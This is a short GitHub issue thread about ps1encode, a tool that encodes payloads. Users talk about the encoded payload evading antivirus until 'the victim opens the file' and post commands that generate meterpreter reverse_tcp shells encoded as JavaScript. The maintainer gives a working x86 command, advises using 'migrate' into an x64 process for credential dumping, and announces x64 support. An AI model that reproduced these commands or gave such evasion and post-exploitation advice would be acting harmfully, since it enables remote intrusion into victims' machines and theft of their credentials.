Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Good but Gets detected.... #9

Open
complexpotato opened this issue Jan 2, 2018 · 3 comments
Open

Good but Gets detected.... #9

complexpotato opened this issue Jan 2, 2018 · 3 comments

Comments

@complexpotato
Copy link

This really should not be an issue but I am just posting this to let other people know...
ps1encode is really good, it does not get caught until the victim opens the file, but it gets caught because the anti virus saw it doing a Evo-Gen activity.
@BeingEasy
Copy link

--PAYLOAD windows/x64/meterpreter/reverse_tcp --ENCODE cmd -t js > x64shell.js
Error: The selected arch is incompatible with the payload
。。
why?

@addenial
Copy link
Contributor

addenial commented Jul 8, 2019

Hey @BeingEasy when selecting your encoder, switch --ENCODE is same as -t.
The tool as of now does not support native x64 shells, but generating standard x86 payload will work on 64bit systems. If you need native architecture meterpreter for credential dumping purposes, I suggest using "migrate" command to hook into x64 process post exploit.

Try this:
。。
--PAYLOAD windows/meterpreter/reverse_tcp --ENCODE js > x86-64shell.js

@addenial
Copy link
Contributor

@BeingEasy added x64 support addenial@a52cb04

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
4 participants
@addenial @BeingEasy @complexpotato and others